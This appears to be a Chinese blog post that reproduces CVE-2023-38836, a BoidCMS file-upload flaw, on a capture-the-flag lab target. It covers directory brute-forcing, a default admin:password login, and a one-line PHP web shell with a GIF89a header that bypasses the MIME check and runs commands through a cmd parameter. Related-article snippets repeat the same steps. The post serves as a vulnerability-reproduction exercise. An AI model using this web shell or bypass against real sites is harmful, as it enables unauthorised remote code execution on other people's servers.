BoidCMS 文件上传漏洞(CVE-2023-38836)

最新推荐文章于 2024-08-04 18:23:51 发布
最新推荐文章于 2024-08-04 18:23:51 发布
阅读量404 收藏 8
点赞数 5
分类专栏: 春秋云境 漏洞复现 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45240382/article/details/140831975
版权

0x01 前言

BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。
影响范围:

  • BoidCMS <= 2.0.0

复现准备:

  • 靶机:春秋云境 http://xxxxx.cloudeci1.ichunqiu.com

0x02 复现

1.登录后台

进入网站,没有看到登录相关内容,对该网站进行目录爆破,发现以下路径:
image.png

http://xxxxx.cloudeci1.ichunqiu.com/admin

进入登录页面:
image.png
尝试弱口令:admin:password 登录成功。
image.png

2.上传木马

找到上传文件位置:
image.png
上传木马文件内容:

GIF89a
<?php system($_GET['cmd']);phpinfo();?>

image.png
点击 view 前往文件路径,在 url 中输入参数:

http://eci-2zeebfpu72fwezconcwq.cloudeci1.ichunqiu.com/media/1.php?cmd=cat /flag

image.png
看到 flag。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

zneVue
关注
专栏目录
PHPCMS V9.6.0任意文件上传漏洞
谢公子的博客
09-09 1688
目录 PHPCMS PHPCMS V9.6.0任意文件上传漏洞 PHPCMS PHPCMS是一款网站管理软件,该软件采用模块化开发,支持多种分类方式,使用它可方便实现个性化网站的设计、开发与维护。它支持众多的程序组合,可轻松实现网站平台迁移,并可广泛满足各种规模的网站需求,可靠性高,是一款具备文章、下载、图片、分类信息、影视、商城、采集、财务等众多功能的强大、易用、可扩展的优秀网站管理软件...
CVE-2023-38836文件上传+命令执行)
热门推荐
Battery的博客
06-18 5万+
BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。
网络安全进阶学习第五课——文件上传漏洞
p36273的博客
07-03 4969
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
BoidCMS文件上传漏洞CVE-2023-38836
qq_23003811的博客
07-24 235
BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。5、上传cmd.php文件,抓包添加GIF头部绕过 MIME 类型检查。6、访问cmd.php上传地址/media/cmd.php成功。2、使用账号密码admin/password登录后台。3、找到文件上传点media。4、制作cmd.php文件。1、后台地址/admin。7、使用蚁剑等工具连接。
CVE-2023-38836 BoidCMSv.2.0.0 后台文件上传漏洞
shelter1234567的博客
03-12 1357
BoidCMS是一个免费的开源平面文件 CMS,用于构建简单的网站和博客,使用 PHP 开发并使用 JSON 作为数据库。它的安装无需配置或安装任何关系数据库(如 MySQL)。您只需要一个支持PHP 的Web服务器。BoidCMS v.2.0.0 中攻击者可通过改变MIME 标头绕过上传限制从而执行任意代码。影响范围: BoidCMS
[春秋云镜] CVE-2023-38836
m0_73649671的博客
04-21 1414
$finfo->file($tmp_name) 这行代码使用了 PHP 中的 FileInfo 扩展(File Information),它提供了一种获取文件信息的方式,特别是文件的 MIME 类型。 具体来说,$finfo->file($tmp_name) 这行代码的作用是读取临时文件的内容并返回其 MIME 类型。 然而这存在漏洞,它是对比文件的前几个字节来确定文件的 MIME 类型。 若我们在shell.php文件里前几个字节加上GIF89a 则这个文件的 MIME 类型 将会是image/gi
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
CentOS 7 升级OpenSSH 9.6p1解决安全漏洞CVE-2023-51384、CVE-2023-51385
weixin_45371131的博客
02-27 1524
openssh9.6P1,
春秋云境CVE-2023-38836
2303_76653367的博客
05-17 492
BoidCMS v.2.0.0 存在文件上传漏洞,远程攻击者可通过添加 GIF 头部绕过 MIME 类型检查,执行任意代码。
织梦CMS上传漏洞修复
caichuoran3785的博客
06-27 685
近段时间老是发现网站title被注入其他信息,应该是被植入***还是什么的,非常困闹,在网站找了一些织梦漏洞的修补方法。 任意文件上传漏洞修复 一、/include/dialog/select_soft_post.php文件,搜索(大概在72行的样子) $fullfilename = $cfg_basedir.$activepath.'/'.$filename; 修改为 if...
【复现】常见CMS漏洞
最新发布
m0_59151303的博客
08-04 705
点击【应用】–》【 插件安装】–》【 上传文件】点击【模板】--》【默认模板管理】--》【index.htm】--> 【修改】在文件修改中添加一句话木马…步骤一:点击【模块】–》【广告管理】--》【增加一个新广告】--》在【广告内容】处添加一句话代码–》点击【确定】步骤二:登陆到后台点击【核心】–》【文件式管理器】--》【文件上传】将准备好的一句话代码上传…步骤一:点击【工具】–》 【文件管理】–》 【功能菜单】 --》【上传文件】–》 【解压】
Gila CMS 文件上传漏洞(CVE-2020-28692)
玄道的网安博客
12-18 1180
简介 Gila CMS是一套基于PHP和MySQL的开源内容管理系统(CMS) 洞概述 攻击者可利用该漏洞可以上传shell到tmp directy,并通过logs函数滥用.htaccess来执行PHP文件。 影响版本 Gila CMS 1.16.0版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/GilaCMS/gila/archive/1.16.0.zip 访问后台页面成功即为安装完成 漏洞复现 登录用户 漏洞url /ad.
CVE-2023-38836~文件上传漏洞【春秋云境靶场渗透】
weixin_67832625的博客
07-31 283
春秋云境模拟真实靶场环境,本题运用了文件上传漏洞,对环境进行渗透,详细介绍了解题思路。
春秋云镜CVE-2023-38836漏洞复现(图文)
q18403417955的博客
07-12 155
CVE-2023-38836
转载:bolt cms V3.7.0 xss和远程代码执行漏洞
qq_43233085的博客
08-14 534
转载:bolt cms V3.7.0 xss和远程代码执行漏洞漏洞环境搭建漏洞分析XSS成因分析远程代码执行成因分析漏洞测试xss远程代码执行影响版本防御方案 漏洞环境搭建 github上下载对应版本,这里下载3.7.0. https://github.com/bolt/bolt/releases 解压后需要重命名以下文件: mv .bolt.yml.dist .bolt.yml mv composer.json.dist composer.json mv composer.lock.dist compo
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2023-0215](https://blog.csdn.net/qq_39933800/article/details/131203431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值